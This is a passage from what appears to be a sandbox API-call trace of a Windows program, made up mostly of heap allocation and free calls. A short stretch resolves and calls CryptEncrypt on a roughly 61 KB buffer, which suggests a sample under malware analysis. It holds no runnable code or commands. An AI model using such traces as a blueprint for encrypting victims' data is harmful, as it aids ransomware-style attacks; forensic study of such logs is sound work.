lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0219.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0e78 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0219.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0219.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0219.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0219.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0219.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0219.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0219.891] CharLowerBuffW (in: lpsz="byte[61504]", cchLength=0xb | out: lpsz="byte[61504]") returned 0xb [0219.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0219.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0219.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0219.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0219.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0219.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0219.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0219.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0219.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0219.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0219.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0219.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0219.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0219.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0219.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0219.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf040) returned 0x2e8f370 [0219.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0219.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0219.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0219.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0219.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0219.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0219.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0219.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0219.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0219.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0219.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0219.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0219.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0219.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0219.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0219.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0219.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0219.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0219.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0219.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0219.897] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0219.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0219.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0219.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0219.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0219.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0219.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51538 [0219.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51538, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0219.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0219.900] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0219.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0219.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0219.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f6e8 [0219.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0219.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0219.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0219.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0219.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0219.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0219.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0219.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0219.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0219.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0219.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0219.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0219.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0219.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0219.901] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e8f370*, pdwDataLen=0x8cef60*=0xf038, dwBufLen=0xf040 | out: pbData=0x2e8f370*, pdwDataLen=0x8cef60*=0xf040) returned 1 [0219.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0219.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0219.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0219.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0219.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0219.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0219.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0219.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0219.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0219.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0219.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0219.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0219.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0219.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0219.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0219.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0219.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0219.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0219.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0219.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0219.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0219.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0219.907] HeapFree (in: hHeap=0x970000, 